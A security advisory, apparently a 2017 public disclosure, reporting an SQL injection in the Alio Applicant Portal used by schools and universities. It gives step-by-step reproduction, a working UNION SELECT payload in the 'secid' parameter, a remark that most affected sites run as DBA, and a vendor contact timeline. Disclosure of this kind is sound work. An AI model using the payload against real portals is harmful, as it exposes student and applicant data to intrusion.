______  ______   _____     ___   _____   _____   _____              
           | ___ \ | ___ \ |  _  |   |_  | |  ___| /  __ \ |_   _|             
           | |_/ / | |_/ / | | | |     | | | |__   | /  \/   | |               
           |  __/  |    /  | | | |     | | |  __|  | |       | |               
           | |     | |\ \  \ \_/ / /\__/ / | |___  | \__/\   | |               
           \_|     \_| \_|  \___/  \____/  \____/   \____/   \_/               
                                                                               
                                                                               
 _____   _   _   _____   _____   _____   _   _  ______   _____   _____  __   __
|_   _| | \ | | /  ___| |  ___| /  __ \ | | | | | ___ \ |_   _| |_   _| \ \ / /
  | |   |  \| | \ `--.  | |__   | /  \/ | | | | | |_/ /   | |     | |    \ V / 
  | |   | . ` |  `--. \ |  __|  | |     | | | | |    /    | |     | |     \ /  
 _| |_  | |\  | /\__/ / | |___  | \__/\ | |_| | | |\ \   _| |_    | |     | |  
 \___/  \_| \_/ \____/  \____/   \____/  \___/  \_| \_|  \___/    \_/     \_/  
                                                                               

       	   [+]---------------------------------------------------------[+]
	    | Vulnerable Software:      Alio Applicant Portal           |
	    | Vendor:                   http://www.myalio.com/          |
	    | Vulnerability Type:       SQL Injection                   |
	    | Date Released:            31/05/2017                      |
	    | Released by:              @insecurity                     |
	   [+]---------------------------------------------------------[+]


Alio Applicant Portal versions 6.0 and prior are vulnerable to error-based SQL Injection via the 
'secid' GET parameter failing to properly sanitize inputs. Alio Applicant Portal is used within the
k12 school system in USA and other international schools and universities to allow applicatints to
electronically sign up for roles (e.g. a student signing up for particular classes or even in some
cases a teacher or lecturer signing up for a job role)

--> Create an account
---> Add something to 'My Resume' and then afterwards click edit.
----> Browse to - http://[VULN]/applicant/resume-section-addedit.php?secid=-2 UNION SELECT 1,2,3,4,5,version(),7,8--+-

It should be noted that the _vast majority_ of vuln sites are running as DBA


Disclosure Timeline:

* Contacted vendor via email (no response) - 17/03/2017
* Called their call center (confused employees)
* Called their corporate offices (more confused employees)
* Emailed a supposed security contact there (no response) - 28/04/2017
* Disclosed vulnerability - 31/05/2017
* Submitted to packetstorm - 14/06/2017

	   [+]---------------------------------------------------------[+]
	    |                      CONTACT US:                          |
	    |                                                           |
	    | IRC:          irc.insecurity.zone (6667/6697) #insecurity |
	    | Twitter:      @insecurity                                 |
	    | Website:      insecurity.zone                             |
	   [+]---------------------------------------------------------[+]